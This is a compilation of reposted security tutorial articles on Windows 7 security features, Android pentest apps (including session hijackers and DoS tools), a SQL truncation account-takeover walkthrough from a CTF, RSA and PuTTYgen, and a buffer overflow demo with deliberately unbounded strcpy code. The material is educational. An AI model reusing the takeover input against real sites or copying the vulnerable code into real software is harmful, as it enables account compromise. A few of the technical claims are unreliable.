Bitlocker is a Windows security feature that was first introduced in Windows Vista and then further enhanced for Windows 7. It provides full disk encryption capabilities for Windows 7. It is included as part of the operating system itself and does not require any third-party plugins to function. It is only available in the Enterprise and Ultimate editions of Windows 7. Bitlocker provides logical volume encryption, i.e. the drive to be encrypted must be partitioned into logical volumes for Bitlocker to work. Bitlocker requires at least two NTFS volumes: one for the OS itself (typically the C drive) and a separate boot partition with a minimum size of 100MB. The boot partition is not encrypted by Bitlocker, as it is required for the system bootstrap process. Bitlocker may be used in conjunction with the Encrypting File System to provide increased security. The Encrypting File System (EFS) is another security feature of Microsoft Windows that was introduced with NTFS version 3.0. It is supported on all Windows systems from Windows 2000 onwards. EFS provides filesystem-level encryption for the user while the operating system is running. This provides an additional layer of protection. Both Bitlocker and EFS make use of 256-bit AES in CBC mode for their encryption needs. EFS also has several other algorithms to choose from.
Full disk encryption in other Operating Systems Full disk encryption is not a new concept and there are many alternatives for it. Full disk encryption is supported by different operating systems in varying degrees. Linux supports two alternatives for full disk encryption, eCryptfs and dm-crypt. eCryptfs provides stacked file system level encryption. This is similar to EFS on Windows. FreeBSD provides full disk encryption through the GBDE (GEOM based Disk Encryption) framework. GBDE only supports 128 bit AES however. FreeBSD also has another full disk encryption framework called GELI. GELI has support for many cryptographic algorithms such as AES, Blowfish, Triple DES, etc. 7. Improved Cryptography Windows 7 features several enhancements in its Cryptographic subsystem. There are several new cryptographic algorithms to choose from, including Blowfish, AES, Triple DES, etc. Windows 7 also includes support for Elliptic curve cryptography. The Kerberos protocol in Windows 7 has been updated to use AES encryption over DES. The Windows LAN manager has been updated to use NTLM2 hashes by default instead of SHA1 or MD5 hashing algorithms. 8. Windows Firewall/Defender Windows 7 includes a new and improved Windows Defender. Windows Defender is an anti-spyware and anti adware software that is included as part of the operating system itself. Windows Defender can be updated like an Anti-virus solution. Windows Firewall is a host based firewall that is included with each copy of Windows. It has been extensively overhauled in Windows 7. It now provides full support for IPsec. Windows firewall also makes use of a new framework called Windows Filtering Platform (WFP). WFP provides improved packet filtering capabilities that are integrated into the TCP/IP stack. 9. Improved Authentication Mechanisms Better authentication support was introduced in Windows 7. This includes support for Biometric access and Smart cards. 
User accounts can be authenticated using two-factor authentication, i.e. a combination of password and smart card. The single sign-on feature has also been introduced. This can be used with smart-cards which can also be integrated with several other security services such as EFS. Winlogon has been upgraded from GINA (Graphical Identification and Authentication) to the Credential provider library. It also supports NTLM2 by default for generating password hashes. This is a significant improvement from the deprecated NTLM hashing algorithm. Winlogon is the interactive login manager for Windows based systems. References Address space layout randomization - Wikipedia, the free encyclopedia Security and safety features new to Windows Vista - Wikipedia, the free encyclopedia Data Execution Prevention - Wikipedia, the free encyclopedia Windows 7 - Wikipedia, the free encyclopedia Encrypting File System - Wikipedia, the free encyclopedia Domain Name System Security Extensions - Wikipedia, the free encyclopedia Managing Risk Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP - Security Research & Defense - Site Home - TechNet Blogs How Mac OS X Implements Password Authentication, Part 2 - Dave Dribin's Blog https://support.microsoft.com/kb/875352 http://support.microsoft.com/kb/956607 Advanced Windows Security: Activating SEHOP | gHacks Technology News By Albert Fruz|May 23rd, 2014 Sursa: Windows 7 Security Features - InfoSec Institute
  10. Penetration Testing Apps for Android Devices Introduction According to recent research, the amount of mobile phone users is larger than PC users. At the same time, the number of people who own Android phones is increasing rapidly. Android phones bring people a lot of convenience, in that it helps people do as much work as they can do on a computer, with no limitation by the location. Android has become a need rather than luxury these days, and its popularity has increased rapidly among available smart phones. There are lots of OS which are available these days, but among all of them, Android is the best one, as it can be handled easily and also it is very easy to implement because of its open source nature. Android App Development has become an important tool for developing mobile applications. The Software Development Kit facilitated by Android assists developers to start developing and working on the applications instantaneously, so the app can be implemented faster. Now that penetration testing is possible by using the Android platform, there will be no need to carry your system to various locations to carry out your pen test. As we all know, penetration testing involves much involvement of the person into their system, but by using your Android phone, you can perform it at any location in the best way you can. The following are the Android applications that you can use for penetration testing. 1. Networking Tools Port Scanner: this tool lets you scan ports on a remote host via its IP or domain name so you can know which ports are open on the host. It supports 3G, protocol recognition, and many other features. Fing: Fing is a professional App for network analysis. A simple and intuitive interface helps you evaluate security levels, detect intruders and resolve network issues. It helps you to find out which devices are connected to your Wi-Fi network, in just a few seconds. Network Discovery: Network Discovery is similar to Fing. 
It is used for device discovery and works as a port scanner for a local area network. tPacketCapture: tPacketCapture does packet capturing without using any root permissions. tPacketCapture uses VpnService provided by Android OS. Captured data are saved as a PCAP file format in the external storage. Droidsheep: Droidsheep is written by Andrew Koch. It works as a session hijacker for non-encrypted sites and allows you to save cookies files/sessions for later analysis. It is no longer available from the developer’s site i.e. droidsheep.de. FaceNiff: FaceNiff is an app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private network. 2. DOS LOIC: LOIC is a tool for network stress testing a denial-of-service attack application. LOIC performs a denial-of-service (DoS) attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host. AnDOSid: AnDOSid allows security professionals to simulate a DOS attack. AnDOSid app launched a HTTP POST flood attack, where the number of HTTP requests becomes so huge, a victim’s server has trouble responding to them all. When the server begins to rely too heavily on its system resources, it crashes. 3. Packet sniffer Intercepter-NG: Intercepter-NG is a multifunctional network toolkit. It has functionality of several famous separate tools and moreover offers a good and unique alternative of Wireshark for Android. The main features are: network discovery with OS detection network traffic analysis password recovery file recovery Shark for Root: Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump, use WireShark or similar software, to preview dump on phone, use Shark Reader. PacketShark: This is a packet sniffer application. 
Features include friendly capture options interface, filter support, live capture view, and Dropbox upload of captured files. It allows viewing of the captured packets — no need to install other application as a viewer. 4. Scanners WPScan: WPScan is a black box WordPress Security Scanner written in Ruby which attempts to find known security weaknesses within WordPress installations. This app was developed by Alessio Dalla Piazza. Its intended use is to be for security professionals or WordPress administrators to assess the security posture of their WordPress installations. WPScan includes user enumeration and will detect timthumb file, theme and WordPress version. Nessus: Nessus is a popular penetration testing tool that is used to perform vulnerability scans with its client/server architecture. Nessus Android app can perform following tasks. Connect to a Nessus server (4.2 or greater) Launch existing scans on the server Start, stop or pause running scans Create and execute new scans and scan templates View and filter reports Network Mapper: A very fast net scanner for network admins that can scan your network in the office and export as CSV via Gmail to give you a map of what devices are on your LAN. Includes a port scanner for security audit scans and a MAC vendor database to identify NIC manufacturers. Can detect firewalled and stealthed computers, quite useful if you are looking for a Windows/firewall box that you can’t see on your network. Useful if you want to find FTP servers, SSH servers, SMB servers, etc. on your network and would help you to diagnose faults. You can save the scan results as a CSV file, which can be imported into Excel/Google Spreadsheet/LibreOffice. 5. Webattack DroidSQLi: DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks. 
DroidSQLi supports the following injection techniques: Time based injection Blind injection Error based injection Normal injection It automatically selects the best technique to use and employs some simple filter evasion methods. Sqlmapchik: sqlmapchik is a cross-platform sqlmap GUI for the popular sqlmap tool. It is primarily aimed to be used on mobile devices. The easiest way to install sqlmapchik on an Android device is to download it from Google Play. 6. Pentesting Suites dSploit: dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device. Once dSploit is started, you will be able to easily map your network, fingerprint alive host’s operating systems and running services, search for known vulnerabilities, crack logon procedures of many tcp protocols, perform man in the middle attacks such as password sniffing, real time traffic manipulation, etc. These are the available modules in the app: RouterPWN Trace Port Scanner Inspector Vulnerability Finder Login Cracker Packet Forger MITM Revenssis Penetration Suite: Revenssis Penetration Suite is a set of all the useful types of tools used in Computer and Web Application security. Web Vulnerability Scanners including: SQL injection scanner XSS scanner DDOS scanner CSRF scanner SSL misconfiguration scanner Remote and Local File Inclusion (RFI/LFI) scanners Useful utilities such as: WHOIS lookup, IP finder, Shell, SSH, Blacklist lookup tool, Ping tool Forensic tools (in implementation) such as malware analyzers, hash crackers, network sniffer, ZIP/RAR password finder, social engineering toolset, reverse engineering tool. 
Vulnerability research lab (sources include: Shodan vulnerability search engine, ExploitSearch, Exploit DB, OSVDB and NVD NIST) Self scan and defense tools for your Android phone against vulnerabilities Connectivity Security Tools for Bluetooth, Wifi and Internet. (NFC, Wifi Direct and USB in implementation) zANTI: zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety. zANTI offers a comprehensive range of fully customizable scans to reveal everything from authentication, backdoor and brute-force attempts to database, DNS and protocol-specific attacks – including rogue access points. 7. Anonymity Orbot: Orbot is a free proxy app that empowers other apps to use the Internet more securely. Orbot uses Tor to encrypt your Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis. Orbot is the safest way to use the Internet on Android. Period. Orbot bounces your encrypted traffic several times through computers around the world, instead of connecting you directly like VPNs and proxies. This process takes a little longer, but the strongest privacy and identity protection available is worth the wait. Use with Orweb, the most anonymous way to access any website, even if it’s normally blocked, monitored, or on the hidden web. Use Gibberbot with Orbot to chat confidentially with anyone, anywhere for free. Any installed app can use Tor if it has a proxy feature, using the settings. You can use private web searching with DuckDuckGo. Orbot can be configured to transparently proxy all of your Internet traffic through Tor. 
You can also choose which specific apps you want to use through Tor. Orbot is free software. OpenVPN: OpenVPN Connect is the official full-featured Android VPN client for the OpenVPN Access Server, Private Tunnel VPN and OpenVPN Community, developed by OpenVPN Technologies, Inc. Does not require a rooted device. Easily import .ovpn profiles from SD card, OpenVPN Access Server, Private Tunnel or via a browser link. Improved power management – preferences setting allows VPN to pause in a low-power state whenever screen is blanked or network is unavailable. Android Keychain integration – OpenVPN profiles may reference a cert/key pair in the Android keychain. Supports hardware-backed keystores Support for multi-factor authentication using OpenVPN static and dynamic challenge/response protocols. Full IPv6 support (at both the tunnel and transport layer). Orweb: Orweb is the most privacy-enhancing web browser on Android for visiting any website, even if it’s normally censored, monitored, or on the hidden web. Orweb is the safest browser on Android. Orweb evades tracking and censorship by bouncing your encrypted traffic several times through computers around the world, instead of connecting you directly like VPNs and proxies. This process takes a little longer, but the strongest privacy and identity protection available is worth the wait. Orweb bypasses almost every kind of network restriction. Orweb does not store any information about the websites you visit. You can prevent sites you visit from installing any cookies (which could track your web activities), allow them selectively, or allow any site to create cookies. JavaScript, a common attack method for malicious software, is disabled by default. Orweb is opensource. Orweb attempts to prevent Flash from loading on sites you visit, blocking many common security threats. 
Orweb is available in: Arabic, Chinese, Dutch, English, Esperanto, Farsi, French, German, Hungarian, Italian, Norwegian, Russian, Spanish, Swedish and Tibetan. Conclusion Android Operating System has been progressing quite rapidly. An innovative and open platform, Android is most popular mobile OS. It is well positioned to address the growing needs of the mobile marketplace. Due to rapid growth of Android, developers are now focusing on developing their tools in the Android environment. The above mentioned Android applications are the proof of that. The Software Development Kit facilitated by Android helps developers to achieve the same. The above applications discussed are ways to perform penetration testing from your Android mobile. We can achieve anonymity and can perform web attacks by using an Android phone. It also provides us with penetration suites and other networking tools. References Nindroid: Pentesting Apps for your Android device - Michael Palumbo Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos) By Mohit Rawat|May 20th, 2014 Sursa: Penetration Testing Apps for Android Devices - InfoSec Institute
  11. SQL Truncation Attack

The SQL truncation vulnerability is a very interesting flaw in the database. Successful exploitation of this issue leads to user account compromise, because an attacker can access any user’s account with a password of his own choosing. Sounds interesting! First we will see why this issue occurs in the database. If user input is not validated for its length, a truncation vulnerability can arise. Suppose MySQL is running in its default mode, the administrator account is named admin, and the username column is limited to 20 characters. Now what’s happening in the backend database?

By default, MySQL will truncate strings longer than the defined maximum column width and only emit a warning. Those warnings are usually seen only in the backend database, not by web applications, and are therefore not handled at all.
MySQL does not compare strings in binary mode. By default, more relaxed comparison rules are used. One of these relaxations is that trailing space characters are ignored during the comparison. This means the string ‘admin’ followed by a trailing space is still equal to the string ‘admin’ in the database, so an application asked to register that name will refuse to accept the new user.

If, however, the attacker provides ‘admin’, then enough spaces to run past the 20-character limit, then ‘ninja’, the application searches the database for this user and cannot find it, because the supplied value is longer than the 20-character username column and matches no stored name. The application therefore accepts the new username and inserts it into the database. Due to the 20-character column length, the database truncates the username and stores it as ‘admin’ followed by trailing spaces. Now the table contains two admin users: ‘admin’ and ‘admin’ padded with spaces.

Now we are going to see a practical scenario of this attack. Recently a Capture the Flag (CTF) challenge took place, and the first issue, needed to capture the first flag, was SQL truncation. We opened the URL and found a login page. Our first attempt was to check for default credentials.
We tried the username admin with the password admin and successfully logged in. What the heck happened? That was our reaction, but this is an online hosted challenge, so somebody had already created an admin account with this password. Our goal, however, is to gain access to admin with our own credentials, which means we first have to create a user by registering in this application. We logged out from the application and found the register link on that page. So we registered a user from this form and then logged into the application. Now it shows the message “You are not Admin”. We need to compromise that admin account. The first thing we know is that the default admin account exists. Next we check whether there is any limit on the length of the username. We verify that a username with 20 characters can be registered. The application accepts up to 20 characters, and the rest of the characters are not accepted. So here we can perform the truncation attack. We again try to register a user, this time with the username ‘admin’ followed by 15 spaces and then ‘ninjasecurity’ (33 characters in total) and the password pass@123. Here the application will accept up to 20 characters, and the rest of the characters, which are ‘ninjasecurity’, will be ignored. The name is inserted into the database as ‘admin’ followed by trailing spaces. Our user is successfully registered. Now we try to log in as admin with the password pass@123 and Boom! We are logged in.

References:
NotSoSecure Labs | Feeling NotSoSecure? We are here to help!
http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/

By Rohit Shaw|May 13th, 2014
Sursa: SQL Truncation Attack - InfoSec Institute
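The truncation behaviour described in the SQL Truncation Attack article above can be sketched in a few lines of Python. This is only a simulation under stated assumptions, not MySQL itself: `db_equal`, `db_store` and `UserTable` are hypothetical helpers that mimic a 20-character column, silent truncation on insert, and comparisons that ignore trailing spaces. The original admin password `s3cret` is also made up for the illustration.

```python
COLUMN_WIDTH = 20  # assumed width of the username column, as in the article


def db_equal(a, b):
    """Mimic a non-binary string comparison: trailing spaces are ignored."""
    return a.rstrip(" ") == b.rstrip(" ")


def db_store(value):
    """Mimic non-strict inserts: over-long values are silently truncated."""
    return value[:COLUMN_WIDTH]


class UserTable:
    """Hypothetical stand-in for the application's users table."""

    def __init__(self):
        self.rows = []  # list of (username, password) tuples

    def exists(self, username):
        return any(db_equal(stored, username) for stored, _ in self.rows)

    def register(self, username, password):
        # The application only checks for an existing name, not for length.
        if self.exists(username):
            return False
        self.rows.append((db_store(username), password))
        return True

    def login(self, username, password):
        return any(
            db_equal(stored, username) and pw == password
            for stored, pw in self.rows
        )


table = UserTable()
table.register("admin", "s3cret")  # the legitimate administrator

# 'admin' + 15 spaces + 'ninjasecurity' is 33 characters long.
crafted = "admin" + " " * 15 + "ninjasecurity"
registered = table.register(crafted, "pass@123")
logged_in = table.login("admin", "pass@123")

print("crafted name registered:", registered)
print("login as admin with attacker password:", logged_in)
```

The sketch also suggests the usual fix: validate the length of the input before the lookup (or reject over-long values instead of truncating them), so that the value that is checked is the same value that gets stored.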
  12. Public Key Cryptography and PuTTYgen – Program for Generating Private and Public Keys

In today’s electronic world where everything is done online, “trust” is hard to come by. Conversations can be snooped on, credit card numbers can be stolen, identities can be exchanged and unseen eyes are everywhere. Imagine business emails being maliciously read by competitors, a company’s proposals being leaked and even crucial corporate information being tampered with. This is where cryptography plays a crucial role: important transactions have to be encrypted with strong algorithms to prevent leakage of information. In this paper we will discuss the basics of cryptography, public key cryptography, the RSA algorithm and the ‘PuTTYgen’ program (which is used to create public and private keys).

It is commonly known that the field of cryptography involves two major models: the symmetric cipher model and the asymmetric (public key) cipher model. The major difference between the two is that the symmetric cipher model uses the same key to encrypt and decrypt messages, whereas the asymmetric cipher model uses different keys for encryption and decryption. Some popular symmetric algorithms are DES (Data Encryption Standard), AES (Advanced Encryption Standard) and Blowfish. Popular asymmetric cipher algorithms include RSA (named after Ron Rivest, Adi Shamir and Leonard Adleman, who designed the algorithm), ElGamal and DSS (Digital Signature Standard).

Public Key Cryptography

The key concepts in public key cryptography are the plain text, the encryption algorithm, the cipher text, the decryption algorithm and the recovered text. In addition, we make use of the most important component of public key cryptography to encrypt and decrypt the text: the public and private keys. If one key is used to encrypt the text, the other key is used to decrypt it. The public and private keys are mathematically connected.
The public keys are normally managed by a trusted third party. Some of the required features of public key cryptography are listed below:
The private key should be infeasible to derive from the public key.
Both the private and public keys should be easy to generate.
Person ‘X’ (also popularly known as ‘Bob’) should easily be able to encrypt a message and send it to person ‘Y’ (also popularly known as ‘Alice’) using person Y’s public key. Similarly, person ‘Y’ should easily be able to decrypt the message using their private key.
A hacker should find it computationally infeasible to recover the original text in spite of knowing the ciphertext and the public key.

Public key cryptography solves two of the symmetric cipher model’s drawbacks:
The key distribution problem, which in the symmetric model is to figure out a way to distribute the keys when a lot of people are involved. This is solved in the asymmetric model by having a public/private key pair, of which only the public key needs to be distributed.
The authentication problem (verifying that the message indeed came from where it should have come from), which is solved in the asymmetric key model by making use of “digital signatures”.

We will next see the RSA algorithm, which uses public key cryptography and is the basis of the PuTTYgen program.

RSA Algorithm

As already stated, ‘RSA’ stands for Ron Rivest, Adi Shamir and Leonard Adleman, who designed the algorithm. Most cryptographic algorithms involve a tremendous amount of mathematics, and the RSA algorithm is no exception. The mathematics behind the RSA algorithm is explained below in a lucid and easy to understand form. The basic idea behind the RSA algorithm is that it: “is a block cipher; it uses very large prime numbers for key generation; and the generated keys are mathematically linked.” (Walsh College, 2010)
There are three steps in the RSA algorithm:
generating the public and private keys
encrypting the message
decrypting the message.
In this paper we will only sketch how the public and private keys are generated.
Generating the public and private keys:
(a) For the RSA algorithm to be secure, two large prime numbers are chosen (‘u’ and ‘v’).
(b) The product of the two numbers is calculated: n = u * v.
(c) The totient of the product is calculated as φ(n) = (u - 1) * (v - 1), where ‘φ’ is the Greek letter ‘phi’.
(d) Next, we need to find values for ‘P’ and ‘Q’, after which the two large prime numbers can be discarded: P * Q ≡ 1 (mod φ(n)). The only condition here is that both ‘P’ and ‘Q’ must be relatively prime to φ(n).
Two numbers are relatively prime if they have no common factors apart from 1. For example, GCD(15, 10) = 5, GCD(18, 10) = 2 and GCD(21, 10) = 1, so 21 and 10 are relatively prime (co-prime) to each other.
Step (d) looks more complicated than it actually is. Assuming ‘P’ to be 7, it can be simplified and rewritten as 7 * Q = K * φ(n) + 1, where ‘K’ can be any whole number.
(e) Now ‘P’ and ‘n’ form the public key, and ‘Q’ and ‘n’ form the private key. (Prime Number Hide-and-Seek: How the RSA Cipher Works)

Explaining the RSA algorithm with an example:
We take two small prime numbers, 5 and 11, for this example.
n = 5 * 11 = 55
φ(55) = (5 - 1) * (11 - 1) = 4 * 10 = 40
Now we need to find numbers ‘P’ and ‘Q’ to fit the equation P * Q ≡ 1 (mod 40), where ‘P’ and ‘Q’ must both be relatively prime to 40. (Prime Number Hide-and-Seek: How the RSA Cipher Works)
If ‘P’ is taken as 7, and the unfamiliar modular arithmetic is replaced with an ordinary equation, we get 7 * Q = K * 40 + 1.
We next take ‘Q’ to be 23, the smallest positive value that satisfies this equation. ‘P’ and ‘Q’ should also not be congruent to each other modulo 40.
The equation now becomes 7 * 23 = 161 = 4 * 40 + 1, so ‘K’ is 4.
So the public key is (7, 55) and the private key is (23, 55).

The RSA algorithm is tough to crack if the keys are long. RSA keys are typically between 1024 and 2048 bits long; a key length of 1024 bits was long considered sufficient for most applications, although 2048 bits or more is now the usual recommendation.
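The worked example above can be checked with a short Python sketch. It reuses the article's own numbers (primes 5 and 11, P = 7); the variable names, the helper functions `encrypt` and `decrypt`, and the sample message 2 are assumptions made for the illustration. Numbers this small are for demonstration only and offer no security.

```python
from math import gcd

# Toy parameters from the worked example (far too small for real use).
u, v = 5, 11
n = u * v                    # modulus shared by both keys
phi = (u - 1) * (v - 1)      # totient of n

P = 7                        # public exponent chosen in the example
assert gcd(P, phi) == 1      # P must be relatively prime to phi

# Modular inverse of P modulo phi (three-argument pow with -1, Python 3.8+).
Q = pow(P, -1, phi)          # private exponent
K = (P * Q - 1) // phi       # the 'K' in P * Q = K * phi + 1


def encrypt(message):
    """Encrypt an integer smaller than n with the public key (P, n)."""
    return pow(message, P, n)


def decrypt(cipher):
    """Decrypt with the private key (Q, n)."""
    return pow(cipher, Q, n)


message = 2                  # assumed sample message
cipher = encrypt(message)
recovered = decrypt(cipher)

print("n =", n, "phi =", phi, "P =", P, "Q =", Q, "K =", K)
print("message:", message, "cipher:", cipher, "recovered:", recovered)
```

Running the sketch should reproduce Q = 23 and K = 4 from the text and return the original message after decryption. Real implementations add padding and use primes hundreds of digits long.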
Attacks against RSA:
There are four different types of attacks that are possible against the RSA algorithm.
Brute force: This means trying all possible private keys. It is very difficult to crack the algorithm this way when the keys are large.
Mathematical attacks: These are equivalent to factoring the product of the two large primes, which has so far not been feasible for large keys.
Timing attacks: The timing attack depends on the running time of the decryption algorithm.
Chosen ciphertext attacks: This type of attack is aimed at the properties of the algorithm. (Stallings)

We will next move on to PuTTYgen, a program for generating public and private keys.

PuTTY

“PuTTY is an SSH and telnet client, developed originally by Simon Tatham for the Windows platform. PuTTY is open source software that is available with source code and is developed and supported by a group of volunteers.” (Download PuTTY) Its companion program PuTTYgen is used to generate public and private keys. The PuTTY programs can be downloaded from this link: http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html. The following screenshot shows the opening screen of the PuTTYgen program. Before we move on to the other aspects of the ‘PuTTYgen’ program, we will briefly divert to the topic of SSH. We can see from the above screenshot that there are SSH-1 RSA, SSH-2 RSA and SSH-2 DSA keys to generate. We will see a brief explanation of SSH next.

SSH

SSH (Secure Shell) is a network protocol used to connect two networked computers securely. By means of SSH, the two computers can perform secure remote command-line login, secure data communication and other secure network services.
SSH “connects, via a secure channel over an insecure network, a server and a client running SSH server and SSH client programs, respectively. The protocol specification distinguishes between two major versions that are referred to as SSH-1 and SSH-2.” (Secure Shell)

Returning to the PuTTYgen program, we can generate public and private keys by moving the mouse cursor constantly over the blank area. The following screenshot shows the result of generating the public and private key pair: As we can see, we have generated SSH-2 RSA keys of length 1024 bits. The public and private keys can be saved as .txt files for later use. If the keys are generated with a length of 2048 bits, security will be enhanced, but at the cost of decreased performance. The ‘passphrase’ field is optional, but using it is recommended. It is used to encrypt the private key in case it falls into the wrong hands. The use of the passphrase is explained on the University of Waterloo website, which states that the private key is like a debit card and the passphrase is the PIN that is used to guard it. “With SSH private keys, if somebody manages to acquire it, they will not be able to use it until they’ve figured out your passphrase. A private key without a passphrase is like a credit card, once they acquire it they can immediately use it.” (SSH Public Key authentication)

Application of the keys generated:
The keys that are generated can be used for SSH authentication with OpenSSH. The public key is the one that will be stored on the server. The private key is the one that will be stored on one’s own computer. Instead of using the traditional username and password to log in, the SSH client proves possession of your private key, and the server verifies this against the public key stored on it.

Conclusion

This paper discussed the basics of cryptography and the need for it, followed by public key cryptography.
We next moved onto the mathematics behind the RSA algorithm and concluded with the PuTTY program, which is used to generate public and private keys. Using public and private keys for authentication may be the future for online login into various websites. Bibliography Download PuTTY. (n.d.). Retrieved April 28, 2014, from putty.org: Download PuTTY - a free SSH and telnet client for Windows Prime Number Hide-and-Seek: How the RSA Cipher Works. (n.d.). Retrieved April 28, 2014, from muppetlabs.com: Prime Number Hide-and-Seek: How the RSA Cipher Works Secure Shell. (n.d.). Retrieved April 29, 2014, from en.wikipedia.org: Secure Shell - Wikipedia, the free encyclopedia SSH Public Key authentication. (n.d.). Retrieved from Waterloo Cheriton School of Computer Science: https://cs.uwaterloo.ca/cscf/howto/ssh/public_key/ Cryptography and Network Security. In W. Stallings. Walsh College. (2010). Retrieved from Walsh College. By Jayanthi|May 2nd, 2014 Sursa: Public Key Cryptography and PuTTYgen – Program for Generating Private and Public Keys - InfoSec Institute
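To make the key-pair idea in the article above more concrete, here is a minimal C sketch of a challenge and response with toy RSA numbers. Everything in it is an assumption made for illustration: the tiny primes (61 and 53), the names `modpow`, `toy_sign` and `toy_verify`, and the bare "sign the challenge" flow. Real SSH keys are 1024 bits or more, and real SSH signs a hash of session data with padding rather than a raw number.

```c
#include <stdint.h>

/* Toy parameters, assumed for illustration only and far too small for real use:
   p = 61, q = 53, n = p * q = 3233, phi = 60 * 52 = 3120,
   public exponent e = 17, private exponent d = 2753 (17 * 2753 mod 3120 == 1). */
enum { TOY_N = 3233, TOY_E = 17, TOY_D = 2753 };

/* Square-and-multiply modular exponentiation: (base^exp) mod mod.
   mod must be nonzero and below 2^32 so the products cannot overflow. */
uint64_t modpow(uint64_t base, uint64_t exp, uint64_t mod)
{
    uint64_t result = 1 % mod;
    base %= mod;
    while (exp > 0) {
        if (exp & 1)
            result = (result * base) % mod;
        base = (base * base) % mod;
        exp >>= 1;
    }
    return result;
}

/* Client side: answer a server-chosen challenge using the private exponent. */
uint64_t toy_sign(uint64_t challenge)
{
    return modpow(challenge, TOY_D, TOY_N);
}

/* Server side: check the answer using only the public key (n, e).
   Returns 1 if the response matches the challenge, 0 otherwise. */
int toy_verify(uint64_t challenge, uint64_t response)
{
    return modpow(response, TOY_E, TOY_N) == challenge % TOY_N;
}
```

A server holding only (n, e) would call `toy_verify(c, r)` on the value `r` returned by the client's `toy_sign(c)`. With a modulus this small, the "mathematical attack" mentioned in the article is trivial, since 3233 factors by hand, which is why key length matters.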
  13. Abstract

This paper explains one of the critical buffer overflow vulnerabilities and the detection approaches that check the referenced buffers at run time, and it suggests other protection mechanisms applied during software deployment configuration. Programs written in C or C++ are inherently susceptible to buffer overflow attacks, because functions are often passed pointers or arrays as parameters without any indication of their size, and such malpractices are exploited later. Buffer overflows remain one of the most critical threats to systems security, especially for deployed software. Successful exploitation of a buffer overflow often leads to arbitrary code execution in the form of so-called shellcode, and to complete, malicious control of the vulnerable application.

Essentials

We shall showcase a buffer overflow vulnerability in a Windows environment via C++ or VC++ code, typically written with VS 2010 or Turbo C++, by creating a Win32 console application. It is expected that readers have a comprehensive understanding of C++ syntax and concepts, especially pointers and arrays. The tools used are: Turbo C++ compiler; VC++.NET; GCC compiler (optional).

Buffer Overflow Bug Demo

An overflow typically happens when something is filled beyond its capacity. Buffer overrun attacks therefore occur in any program that allows input to be written beyond the end of an assigned buffer (memory block). The data then overwrites adjacent memory locations that already hold other data or instructions. In a buffer overflow attack, the attacker overwrites memory that was reserved for other purposes in order to inject malicious arbitrary code, and the intended program behavior is eventually changed. These buffer overflows are the result of poor programming practices that put no bounds on the size of the input the program can handle.
C and C++ programs are a common source of buffer overflow vulnerabilities, because these languages allow direct access to application memory. Sometimes attackers find other ways to exploit an overflow besides getting their code to run. Certain overflows do not actually allow attackers to take control, but might instead allow them to manipulate extra data. Let’s examine the following bofVul.exe console-based login program, which accepts a user name and password at the command line to validate users. If they enter the correct user name and password, it allows access; otherwise, access is denied as follows: This program has run perfectly up to now, but imagine that a person with malicious intent enters the parameters in the following form. He tries to overflow the buffer by entering garbage values and finds that he gets into the program even without the correct user name and password. Bingo! It even reveals the welcome message that is shown when the user enters the correct credentials. So, this is a bit strange; how can this be possible? We have just entered a sequence of raw data instead of the password and successfully obtained access. Using a different password with the same user id still worked! So it is a clear case of a buffer overflow bug, because the program lets you log in if you specify a long password, regardless of whether the password is correct.

Buffer Overrun Internal

A buffer overflow is one of the costliest security vulnerabilities known to affect computer software. It occurs when input is larger than the space allocated for it but is written there anyhow, so that memory outside the allocated location is overwritten. In some cases, overflows result from incorrect handling of mathematical operations or from attempts to use memory after it has already been freed.
Although many overflows occur when the program receives more data than it expects, there are in fact many different kinds of overflows. It is important to distinguish between the various classes of overflows in order to develop good test cases that identify specific types.

Integer overflow: This occurs when a data type or CPU register meant to hold values within a certain range is assigned a value outside that range. An integer overflow often leads to a buffer overflow when it occurs while computing the size of the memory to allocate.
Stack overflow: This occurs when data is written past the end of buffers allocated on the stack.
Heap overflow: This occurs when data is written outside the space that was allocated for it on the heap.
Format string attacks: These occur when attacker-controlled input is used as a format string, so that the %n specifier can be used to write data outside the target buffer.

It is important to look at the CPU internals by examining the registers that play a significant role in memory management.

EIP [Extended Instruction Pointer]: It is managed only by the CPU and holds the address (offset) of the next instruction to execute.
ESP [Extended Stack Pointer]: It points to the top of the stack and is used by the CPU to perform push and pop operations.
EBP [Extended Base Pointer]: It is used as a reference point for indirect addressing of a function's parameters and local variables.
EAX/EBX/ECX/EDX: They are used for arithmetic and data movement.
Segments [CS/DS/SS/FS/ES/GS]: They are used as base locations for program data, instructions and the stack.

When a function is called with the assembler 'call' instruction, a new stack frame is created, with boundaries defined by EBP and ESP. First, the call instruction pushes the return address (the EIP of the instruction after the call) onto the stack, and execution continues in the called function. The function saves the caller's EBP, the current ESP becomes the new EBP, and then space for local variables is allocated by subtracting their size from ESP.
Finally, at the end of the function call, ESP is restored from EBP and the saved EBP is popped, which releases the stack frame before the function returns. Now, let's consider one more buffer overflow sample, developed in Visual C++. Here the user name and password are supplied as command line arguments, which are copied into corresponding fixed-length character arrays using the strcpy function. Later, the supplied password is validated against a predefined password via the strcmp function as follows:

    #include <stdio.h>
    #include <string.h>

    #define BUFF_SIZE 10

    void creed(char *usr, char *password)
    {
        char uN[BUFF_SIZE];
        char pass[BUFF_SIZE];

        /* Deliberately vulnerable: strcpy performs no bounds checking. */
        strcpy(uN, usr);
        strcpy(pass, password);

        if (strcmp(pass, "ajay")) {
            printf("\n Access Denied \n");
        } else {
            printf("\n Welcome:");
            ..
        }
    }

    int main(int argc, char* argv[])
    {
        ..
        creed(argv[1], argv[2]);
        return 0;
    }

